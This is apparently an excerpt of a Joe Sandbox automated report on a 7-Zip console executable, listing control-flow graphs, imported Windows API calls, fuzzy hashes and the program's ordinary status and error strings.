                                                                                                                                                                control_flow_graph 2037 7b5458-7b54e2 2038 7b54f2-7b54f6 2037->2038 2039 7b54e4-7b54f0 2037->2039 2040 7b54fe-7b5504 2038->2040 2039->2040 2041 7b550a 2040->2041 2042 7b55ec-7b55fd 2040->2042 2043 7b550d-7b5538 call 797d28 call 793208 2041->2043 2044 7b55ff-7b560a call 792130 2042->2044 2045 7b5612-7b5615 2042->2045 2058 7b553a-7b554c call 797ebc 2043->2058 2059 7b556c-7b559c call 79b8f0 free 2043->2059 2044->2045 2048 7b5617-7b561f memset 2045->2048 2049 7b5624-7b5639 call 792130 2045->2049 2048->2049 2056 7b563b-7b563e call 7a3524 2049->2056 2057 7b5648 2049->2057 2066 7b5643-7b5646 2056->2066 2061 7b564b-7b5656 2057->2061 2068 7b5551-7b5554 2058->2068 2059->2043 2074 7b55a2 2059->2074 2062 7b5658-7b5661 2061->2062 2063 7b5662-7b56d1 call 7b43b0 2061->2063 2062->2063 2076 7b56fd-7b5715 2063->2076 2077 7b56d3-7b56e3 2063->2077 2066->2061 2072 7b5556-7b5562 2068->2072 2073 7b55a4-7b55c7 _CxxThrowException 2068->2073 2075 7b55c8-7b55eb _CxxThrowException 2072->2075 2078 7b5564 2072->2078 2073->2075 2074->2042 2075->2042 2079 7b571b-7b571e 2076->2079 2080 7b5f1d-7b5f22 2076->2080 2077->2076 2086 7b56e5-7b56f8 free 2077->2086 2078->2059 2084 7b5726-7b572a 2079->2084 2081 7b5f29-7b5f3d 2080->2081 2082 7b5f24-7b5f27 2080->2082 2094 7b5f3f-7b5f52 free 2081->2094 2095 7b5f54-7b5f67 2081->2095 2082->2081 2085 7b5f8d-7b6002 free * 2 2082->2085 2087 7b5730-7b575f call 797d28 call 793208 2084->2087 2088 7b5c37-7b5c50 2084->2088 2098 7b6004-7b6017 2085->2098 2099 7b5f7c-7b5f8b free 2086->2099 2103 7b5772-7b577e call 797ebc 2087->2103 2104 7b5761-7b5770 2087->2104 2088->2084 2090 7b5c56-7b5c5a 2088->2090 2090->2080 2094->2099 2095->2085 2105 7b5f69-7b5f7b free 2095->2105 2099->2098 2109 7b5783-7b5786 2103->2109 2106 7b579e-7b57b4 call 7d1544 2104->2106 2105->2099 2113 7b57ba-7b586c call 7b4504 call 7b42a8 call 7b40c4 call 793404 call 7c4c00 2106->2113 2114 7b5c5f-7b5c80 free * 2 2106->2114 2110 7b5ef9-7b5f1c _CxxThrowException 2109->2110 2111 7b578c-7b5798 2109->2111 2110->2080 2111->2106 2111->2110 2126 7b586e-7b5876 2113->2126 2127 7b587d-7b5883 2113->2127 2114->2099 2128 7b5889-7b58b3 call 7d1bc0 2126->2128 2129 7b5878 2126->2129 2127->2128 2130 7b5c85-7b5c9e free 2127->2130 2136 7b58b9-7b58bc 2128->2136 2137 7b5d02-7b5d1e free 2128->2137 2129->2127 2131 7b5cbe-7b5cfd free call 7b4610 free * 2 2130->2131 2132 7b5ca0 2130->2132 2131->2099 2134 7b5ca4-7b5cbc free 2132->2134 2134->2131 2134->2134 2141 7b58c2-7b58d3 2136->2141 2142 7b59b1-7b59bd 2136->2142 2139 7b5d3e-7b5d7b free call 7b4610 free * 2 2137->2139 2140 7b5d20 2137->2140 2139->2099 2146 7b5d24-7b5d3c free 2140->2146 2148 7b5933 2141->2148 2149 7b58d5-7b5907 call 797d28 call 793208 call 797ebc 2141->2149 2144 7b5a8e-7b5a93 2142->2144 2145 7b59c3-7b59cd 2142->2145 2151 7b5aa1-7b5ab9 2144->2151 2152 7b59d3-7b59e1 2145->2152 2153 7b5a95-7b5a9a 2145->2153 2146->2139 2146->2146 2155 7b5936-7b594f free 2148->2155 2189 7b5909-7b5915 2149->2189 2190 7b5924-7b5931 free 2149->2190 2159 7b5abb-7b5ac3 2151->2159 2160 7b5acc 2151->2160 2157 7b59e3-7b59ed 2152->2157 2158 7b5a55-7b5a58 2152->2158 2153->2151 2161 7b596f-7b59ac free call 7b4610 free 2155->2161 2162 7b5951 2155->2162 2164 7b59f5-7b5a11 call 7b4434 2157->2164 2168 7b5a5a-7b5a86 2158->2168 2169 7b5a9c 2158->2169 2159->2160 2165 7b5ac5-7b5aca 2159->2165 2166 7b5acf-7b5b54 call 7b47ac 2160->2166 2161->2088 2170 7b5955-7b596d free 2162->2170 2181 7b5a13-7b5a15 2164->2181 2182 7b5a21-7b5a30 2164->2182 2165->2166 2183 7b5b5a-7b5b61 2166->2183 2184 7b5dfe-7b5e1a free 2166->2184 2185 7b5a8c 2168->2185 2186 7b5d80-7b5d9c free 2168->2186 2169->2151 2170->2161 2170->2170 2181->2182 2191 7b5a17-7b5a1d 2181->2191 2182->2164 2192 7b5a32-7b5a52 2182->2192 2193 7b5b63-7b5b7e 2183->2193 2194 7b5b80 2183->2194 2187 7b5e3a-7b5e77 free call 7b4610 free * 2 2184->2187 2188 7b5e1c 2184->2188 2185->2151 2195 7b5d9e 2186->2195 2196 7b5dbc-7b5df9 free call 7b4610 free * 2 2186->2196 2187->2099 2197 7b5e20-7b5e38 free 2188->2197 2189->2190 2199 7b5917-7b591f 2189->2199 2190->2155 2191->2182 2192->2158 2200 7b5b88-7b5bb6 2193->2200 2194->2200 2201 7b5da2-7b5dba free 2195->2201 2196->2099 2197->2187 2197->2197 2199->2190 2204 7b5e7c-7b5e95 free 2200->2204 2205 7b5bbc-7b5bd6 free 2200->2205 2201->2196 2201->2201 2207 7b5e97 2204->2207 2208 7b5eb5-7b5ef4 free call 7b4610 free * 2 2204->2208 2209 7b5bd8-7b5bdc 2205->2209 2210 7b5bff-7b5c12 free call 7b4610 2205->2210 2215 7b5e9b-7b5eb3 free 2207->2215 2208->2099 2211 7b5bde-7b5bf5 free 2209->2211 2218 7b5c17-7b5c35 free 2210->2218 2211->2211 2217 7b5bf7 2211->2217 2215->2208 2215->2215 2217->2210 2218->2088
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$ExceptionThrow$memset
                                                                                                                                                                • String ID: can't decompress folder$there is no such archive
                                                                                                                                                                • API String ID: 4182836161-2069749860
                                                                                                                                                                • Opcode ID: 2e8de8ec95246ae197428a0f4b46b566b2038643631a74e7977ba0014a39102a
                                                                                                                                                                • Instruction ID: 66b7e219491591c355e16e36f871ce47fca56a4228e5ff5173639899b2697e17
                                                                                                                                                                • Opcode Fuzzy Hash: 2e8de8ec95246ae197428a0f4b46b566b2038643631a74e7977ba0014a39102a
                                                                                                                                                                • Instruction Fuzzy Hash: 5E525B32249AC5D6CA20EB29E4847EEB760F786B94F405112DF9D53B29DF3CC856CB40
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 32ea17c43f2656eab24867a4277591ee53f988a9c8a634700e00343675cc7f60
                                                                                                                                                                • Instruction ID: 7789190ed393242781ca8553faf1e8c6210464261f7a01e698ef0ba63e965a1d
                                                                                                                                                                • Opcode Fuzzy Hash: 32ea17c43f2656eab24867a4277591ee53f988a9c8a634700e00343675cc7f60
                                                                                                                                                                • Instruction Fuzzy Hash: 82425D3A20AAC4C6CB24EB25E494BAE7765F38AF88F555016EA4E47B16CF3CC495C704
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0079AC84
                                                                                                                                                                • OpenProcessToken.ADVAPI32 ref: 0079AC95
                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32 ref: 0079ACA9
                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,FFFFFFFF,?,0079F928), ref: 0079ACE0
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,0079F928), ref: 0079ACEA
                                                                                                                                                                • CloseHandle.KERNELBASE ref: 0079ACFA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3398352648-0
                                                                                                                                                                • Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                • Instruction ID: 69154792ab5198b95fbc0802d330d6211251160fd0f2d3943a3bec3a2e2e0d69
                                                                                                                                                                • Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                • Instruction Fuzzy Hash: 76018062A1868587DB108F60F88079A73B1FB80B85F548136EB4B83A54CF3CD489CB40
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0079794C: FindClose.KERNELBASE ref: 0079795E
                                                                                                                                                                • FindFirstFileW.KERNELBASE ref: 007979BA
                                                                                                                                                                  • Part of subcall function 0079339C: free.MSVCRT ref: 007933D7
                                                                                                                                                                  • Part of subcall function 0079339C: memmove.MSVCRT(00000000,?,?,00000000,007910A8), ref: 007933F2
                                                                                                                                                                • FindFirstFileW.KERNELBASE ref: 007979FA
                                                                                                                                                                • free.MSVCRT ref: 00797A08
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$FileFirstfree$Closememmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2921071498-0
                                                                                                                                                                • Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                • Instruction ID: bd8c0779034183b9863d86c6bd9c3da94ce7c1827ded60c0bfef1885cb77a5c3
                                                                                                                                                                • Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                • Instruction Fuzzy Hash: E0210836218A8096DF21DF28F44436D6361F78A7B8F548321EAA9477D9DF3CCA09C740
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: h{$Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
                                                                                                                                                                • API String ID: 0-30538505
                                                                                                                                                                • Opcode ID: 93a017d1596765492eb84318f4eb14f9a219988a9175275ef03531af29d7c757
                                                                                                                                                                • Instruction ID: 1e6f0c69fca39ef0ba457f6aa6512c780133bdf92d5a524043d0c046d601ef51
                                                                                                                                                                • Opcode Fuzzy Hash: 93a017d1596765492eb84318f4eb14f9a219988a9175275ef03531af29d7c757
                                                                                                                                                                • Instruction Fuzzy Hash: 94036032249A84D2CE34EB25E4946AEB761F7C6BC0F544212EB9E47B25DF7DC986C700

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1016 7d950d-7d9510 1017 7d9516-7d9529 call 79ed74 1016->1017 1018 7d9a40-7d9a8e call 792130 1016->1018 1024 7d952f-7d9537 1017->1024 1025 7d9820-7d9828 1017->1025 1026 7d9a90-7d9aa0 call 793314 1018->1026 1027 7d9aa2 1018->1027 1028 7d9539-7d9541 1024->1028 1029 7d9557-7d95d5 call 7d3230 call 793208 1024->1029 1030 7d982e-7d983f call 7d78a8 1025->1030 1031 7d99e4-7d99ee 1025->1031 1035 7d9aa5-7d9ac8 call 79b8f0 call 792130 1026->1035 1027->1035 1028->1029 1034 7d9543-7d9552 call 793518 1028->1034 1056 7d95e5 1029->1056 1057 7d95d7-7d95df 1029->1057 1045 7d984c-7d994d call 7d6990 call 792bc8 call 7b7880 call 792bc8 call 792cdc call 7d6c04 1030->1045 1046 7d9841-7d9845 1030->1046 1037 7d9a20-7d9a3f _CxxThrowException 1031->1037 1038 7d99f0-7d9a1b call 792300 fputs * 2 call 792300 1031->1038 1034->1029 1059 7d9adc 1035->1059 1060 7d9aca-7d9ada call 793314 1035->1060 1037->1018 1038->1037 1097 7d994f 1045->1097 1098 7d9980-7d99df free * 5 call 7d6a20 1045->1098 1046->1045 1062 7d95e8-7d9631 call 793404 call 7d780c 1056->1062 1057->1056 1061 7d95e1-7d95e3 1057->1061 1065 7d9adf-7d9c8b call 79b8f0 call 792130 1059->1065 1060->1065 1061->1062 1078 7d963e-7d964d 1062->1078 1079 7d9633-7d9637 1062->1079 1089 7d9c8d-7d9c98 call 7d7414 1065->1089 1090 7d9c9a 1065->1090 1082 7d964f-7d9657 1078->1082 1083 7d9663 1078->1083 1079->1078 1082->1083 1086 7d9659-7d9661 1082->1086 1087 7d966b-7d972c call 793404 call 7d6990 call 792bc8 1083->1087 1086->1087 1120 7d972f call 7c99b8 1087->1120 1094 7d9c9d-7d9ca8 1089->1094 1090->1094 1100 7d9caa-7d9cb3 1094->1100 1101 7d9cb4-7d9d77 call 793404 1094->1101 1103 7d9953-7d9969 1097->1103 1115 7da5ad-7da5b5 1098->1115 1100->1101 1113 7d9d79-7d9d7d 1101->1113 1114 7d9d83-7d9e8a call 7d71ec call 793404 call 79ef70 call 793208 call 7b6be0 1101->1114 1107 7d997b-7d997e 1103->1107 1108 7d996b-7d9976 free * 2 1103->1108 1107->1098 1107->1103 1108->1107 1113->1114 1160 7d9e8c-7d9eb4 call 7b6e08 1114->1160 1161 7d9ed2-7d9f44 call 7b5458 1114->1161 1118 7da5c5-7da5c8 1115->1118 1119 7da5b7-7da5be 1115->1119 1123 7da5ca-7da5e6 _CxxThrowException 1118->1123 1124 7da5e7-7da603 free 1118->1124 1119->1118 1122 7da5c0 1119->1122 1125 7d9734-7d973f 1120->1125 1129 7da5c0 call 7d66a8 1122->1129 1123->1124 1130 7da605 1124->1130 1131 7da626-7da637 free call 7ba13c 1124->1131 1126 7d9741-7d974b call 7db1c8 1125->1126 1127 7d9750-7d9798 call 7d6c04 1125->1127 1126->1127 1141 7d97cb-7d981b free * 3 call 7d6a20 free call 7db310 1127->1141 1142 7d979a 1127->1142 1129->1118 1135 7da609-7da624 free 1130->1135 1137 7da63c-7da675 call 7d7080 call 79182c call 7d7f50 1131->1137 1135->1131 1135->1135 1163 7da6a8-7da6c9 free 1137->1163 1164 7da677 1137->1164 1141->1115 1145 7d979e-7d97b4 1142->1145 1149 7d97c6-7d97c9 1145->1149 1150 7d97b6-7d97c1 free * 2 1145->1150 1149->1141 1149->1145 1150->1149 1160->1161 1174 7d9eb6-7d9ed1 _CxxThrowException 1160->1174 1166 7d9f49-7d9f53 1161->1166 1167 7da67b-7da691 1164->1167 1170 7d9f55-7d9f5b call 7db1c8 1166->1170 1171 7d9f60-7d9f68 1166->1171 1172 7da6a3-7da6a6 1167->1172 1173 7da693-7da69e free * 2 1167->1173 1170->1171 1176 7d9fbd-7d9fca 1171->1176 1177 7d9f6a-7d9f74 1171->1177 1172->1163 1172->1167 1173->1172 1174->1161 1178 7da02c-7da033 1176->1178 1179 7d9fcc-7d9fcf call 792300 1176->1179 1180 7d9f76-7d9fac call 792300 fputs call 792300 call 792320 call 792300 1177->1180 1181 7d9fb1-7d9fb9 1177->1181 1184 7da035-7da03a 1178->1184 1185 7da063-7da06a 1178->1185 1186 7d9fd4-7d9fdc 1179->1186 1180->1181 1181->1176 1184->1185 1190 7da03c-7da05e fputs call 7926a0 call 792300 1184->1190 1187 7da06c-7da071 1185->1187 1188 7da09e-7da0a1 1185->1188 1186->1178 1191 7d9fde-7da027 fputs call 7926a0 call 792300 fputs call 7926a0 call 792300 1186->1191 1192 7da114-7da11b 1187->1192 1193 7da077-7da099 fputs call 7926a0 call 792300 1187->1193 1188->1192 1194 7da0a3-7da0aa 1188->1194 1190->1185 1191->1178 1200 7da11d-7da122 1192->1200 1201 7da15c-7da15f 1192->1201 1193->1188 1202 7da0ac-7da0ce fputs call 7926a0 call 792300 1194->1202 1203 7da0d3-7da0da 1194->1203 1206 7da161 1200->1206 1210 7da124-7da133 call 792300 1200->1210 1205 7da16c-7da16f 1201->1205 1201->1206 1202->1203 1203->1192 1213 7da0dc-7da0eb call 792300 1203->1213 1215 7da175-7da17c 1205->1215 1216 7da320-7da50a free * 2 call 7b6b58 free call 7d7968 1205->1216 1206->1205 1210->1206 1235 7da135-7da157 fputs call 7926a0 call 792300 1210->1235 1213->1192 1230 7da0ed-7da10f fputs call 7926a0 call 792300 1213->1230 1224 7da2e7-7da2f6 call 792300 1215->1224 1225 7da182-7da189 1215->1225 1268 7da53d-7da559 free 1216->1268 1269 7da50c 1216->1269 1224->1216 1247 7da2f8-7da31f fputs call 7926a0 call 792300 1224->1247 1225->1224 1232 7da18f-7da192 1225->1232 1230->1192 1232->1216 1238 7da198-7da1a3 1232->1238 1235->1201 1244 7da1d5-7da1de 1238->1244 1245 7da1a5-7da1cd fputs call 7926a0 call 792300 1238->1245 1251 7da1e0-7da1e3 1244->1251 1252 7da1f3-7da223 fputs call 7926a0 call 792300 1244->1252 1245->1244 1247->1216 1251->1252 1257 7da1e5-7da1ed 1251->1257 1263 7da275-7da2c3 fputs call 7926a0 call 792300 fputs call 7926a0 call 792300 1252->1263 1277 7da225-7da270 fputs call 7926a0 call 792300 fputs call 7926a0 call 792300 1252->1277 1257->1252 1257->1263 1291 7da2c8-7da2cb 1263->1291 1271 7da58c-7da599 free 1268->1271 1272 7da55b 1268->1272 1274 7da510-7da526 1269->1274 1271->1115 1276 7da55f-7da575 1272->1276 1278 7da538-7da53b 1274->1278 1279 7da528-7da533 free * 2 1274->1279 1281 7da587-7da58a 1276->1281 1282 7da577-7da582 free * 2 1276->1282 1277->1263 1278->1268 1278->1274 1279->1278 1281->1271 1281->1276 1282->1281 1291->1216 1293 7da2cd-7da2e5 call 792300 call 7d291c 1291->1293 1293->1216
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$ExceptionThrowfputs$fputc
                                                                                                                                                                • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                                                                                                                                                                • API String ID: 1639683984-435538426
                                                                                                                                                                • Opcode ID: 6c48770ca91270eb0f43c18a396e1d0d422bd449a714dd2617b0154431f8733d
                                                                                                                                                                • Instruction ID: 6c267f52bc82bbe57a3b917b98687430b66af35fe22a584d1c9a742ef5b22811
                                                                                                                                                                • Opcode Fuzzy Hash: 6c48770ca91270eb0f43c18a396e1d0d422bd449a714dd2617b0154431f8733d
                                                                                                                                                                • Instruction Fuzzy Hash: ED724472209AC5E5CA34EB25F8943EEA3B1F785B80F444126DA9E47B1ADF3CC556CB01

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1833 7d9b5d-7d9b5f 1834 7d9b79-7d9c1f call 7d057c call 793208 call 7b38e8 free 1833->1834 1835 7d9b61-7d9b74 fputs call 792300 1833->1835 1843 7d9c21-7d9c2b call 7db1c8 1834->1843 1844 7d9c30-7d9c33 1834->1844 1835->1834 1843->1844 1846 7d9c35-7d9c3c 1844->1846 1847 7d9c54-7d9c8b call 7db310 call 792130 1844->1847 1846->1847 1849 7d9c3e-7d9c4e call 7d0994 1846->1849 1857 7d9c8d-7d9c98 call 7d7414 1847->1857 1858 7d9c9a 1847->1858 1853 7d9c53 1849->1853 1853->1847 1860 7d9c9d-7d9ca8 1857->1860 1858->1860 1862 7d9caa-7d9cb3 1860->1862 1863 7d9cb4-7d9d77 call 793404 1860->1863 1862->1863 1867 7d9d79-7d9d7d 1863->1867 1868 7d9d83-7d9e8a call 7d71ec call 793404 call 79ef70 call 793208 call 7b6be0 1863->1868 1867->1868 1879 7d9e8c-7d9eb4 call 7b6e08 1868->1879 1880 7d9ed2-7d9f53 call 7b5458 1868->1880 1879->1880 1887 7d9eb6-7d9ed1 _CxxThrowException 1879->1887 1885 7d9f55-7d9f5b call 7db1c8 1880->1885 1886 7d9f60-7d9f68 1880->1886 1885->1886 1889 7d9fbd-7d9fca 1886->1889 1890 7d9f6a-7d9f74 1886->1890 1887->1880 1891 7da02c-7da033 1889->1891 1892 7d9fcc-7d9fcf call 792300 1889->1892 1893 7d9f76-7d9fac call 792300 fputs call 792300 call 792320 call 792300 1890->1893 1894 7d9fb1-7d9fb9 1890->1894 1897 7da035-7da03a 1891->1897 1898 7da063-7da06a 1891->1898 1899 7d9fd4-7d9fdc 1892->1899 1893->1894 1894->1889 1897->1898 1903 7da03c-7da05e fputs call 7926a0 call 792300 1897->1903 1900 7da06c-7da071 1898->1900 1901 7da09e-7da0a1 1898->1901 1899->1891 1904 7d9fde-7da027 fputs call 7926a0 call 792300 fputs call 7926a0 call 792300 1899->1904 1905 7da114-7da11b 1900->1905 1906 7da077-7da099 fputs call 7926a0 call 792300 1900->1906 1901->1905 1907 7da0a3-7da0aa 1901->1907 1903->1898 1904->1891 1913 7da11d-7da122 1905->1913 1914 7da15c-7da15f 1905->1914 1906->1901 1915 7da0ac-7da0ce fputs call 7926a0 call 792300 1907->1915 1916 7da0d3-7da0da 1907->1916 1919 7da161 1913->1919 1923 7da124-7da133 call 792300 1913->1923 1918 7da16c-7da16f 1914->1918 1914->1919 1915->1916 1916->1905 1926 7da0dc-7da0eb call 792300 1916->1926 1928 7da175-7da17c 1918->1928 1929 7da320-7da50a free * 2 call 7b6b58 free call 7d7968 1918->1929 1919->1918 1923->1919 1948 7da135-7da157 fputs call 7926a0 call 792300 1923->1948 1926->1905 1943 7da0ed-7da10f fputs call 7926a0 call 792300 1926->1943 1937 7da2e7-7da2f6 call 792300 1928->1937 1938 7da182-7da189 1928->1938 1981 7da53d-7da559 free 1929->1981 1982 7da50c 1929->1982 1937->1929 1960 7da2f8-7da31f fputs call 7926a0 call 792300 1937->1960 1938->1937 1945 7da18f-7da192 1938->1945 1943->1905 1945->1929 1951 7da198-7da1a3 1945->1951 1948->1914 1957 7da1d5-7da1de 1951->1957 1958 7da1a5-7da1cd fputs call 7926a0 call 792300 1951->1958 1964 7da1e0-7da1e3 1957->1964 1965 7da1f3-7da223 fputs call 7926a0 call 792300 1957->1965 1958->1957 1960->1929 1964->1965 1970 7da1e5-7da1ed 1964->1970 1976 7da275-7da2c3 fputs call 7926a0 call 792300 fputs call 7926a0 call 792300 1965->1976 1990 7da225-7da270 fputs call 7926a0 call 792300 fputs call 7926a0 call 792300 1965->1990 1970->1965 1970->1976 2016 7da2c8-7da2cb 1976->2016 1984 7da58c-7da5b5 free 1981->1984 1985 7da55b 1981->1985 1987 7da510-7da526 1982->1987 1998 7da5c5-7da5c8 1984->1998 1999 7da5b7-7da5be 1984->1999 1989 7da55f-7da575 1985->1989 1992 7da538-7da53b 1987->1992 1993 7da528-7da533 free * 2 1987->1993 1995 7da587-7da58a 1989->1995 1996 7da577-7da582 free * 2 1989->1996 1990->1976 1992->1981 1992->1987 1993->1992 1995->1984 1995->1989 1996->1995 2004 7da5ca-7da5e6 _CxxThrowException 1998->2004 2005 7da5e7-7da603 free 1998->2005 1999->1998 2003 7da5c0 call 7d66a8 1999->2003 2003->1998 2004->2005 2009 7da605 2005->2009 2010 7da626-7da637 free call 7ba13c 2005->2010 2013 7da609-7da624 free 2009->2013 2015 7da63c-7da675 call 7d7080 call 79182c call 7d7f50 2010->2015 2013->2010 2013->2013 2031 7da6a8-7da6c9 free 2015->2031 2032 7da677 2015->2032 2016->1929 2019 7da2cd-7da2e5 call 792300 call 7d291c 2016->2019 2019->1929 2033 7da67b-7da691 2032->2033 2035 7da6a3-7da6a6 2033->2035 2036 7da693-7da69e free * 2 2033->2036 2035->2031 2035->2033 2036->2035
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: fputcfputsfree
